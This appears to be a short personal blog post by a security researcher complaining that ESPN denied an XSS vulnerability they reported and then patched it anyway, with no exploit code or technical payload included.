I reported a severe XSS vulnerability in ESPN… and they completely denied its existence (Thanks ESPN #0)
Companies have recently made a shift towards offering bug bounty programs to reward responsible researchers for reporting vulnerabilities. You’ve got companies like Google and Facebook that go out of their way to ensure that every facet of their website is secure, and reward hackers who find holes.
There’s some companies that don’t offer bug bounty programs, which is completely understandable. When you report a vulnerability to these companies, they’ll be grateful that you disclosed it rather than abusing it.
And then… you’ve got ESPN. Ah, yes, ESPN, who notoriously give not a single concern towards security risks.
Being a responsible white hat hacker, I emailed ESPN of an XSS vulnerability that I discovered. XSS, if you’re unaware, allows an attacker to execute code on the user’s side, which allows the attacker to steal a user’s cookies and comprimise their account.
To my surprise, they not only refused to acknowledge my help, but went so far as to deny that a vulnerability existed in the first place.
That’s right, I responsibly disclosed a vulnerability to ESPN, and they told me that, no, I was wrong, and there was no security risk.
And that was after I provided a screenshot showing the vulnerability, and steps to reproduce it:
Indeed, after checking back a few days later, ESPN had fixed the vulnerability. So they took my feedback, denied that it existed, and patched the vulnerability anyways.
And what’s that? “We apologize for the confusion”? As if it’s somehow harming my experience that I went out of my way to report this?
That’s it, ESPN. If my vulnerabilities don’t exist, I might as well post them for the internet to see. And, boy, do I have some to disclose…
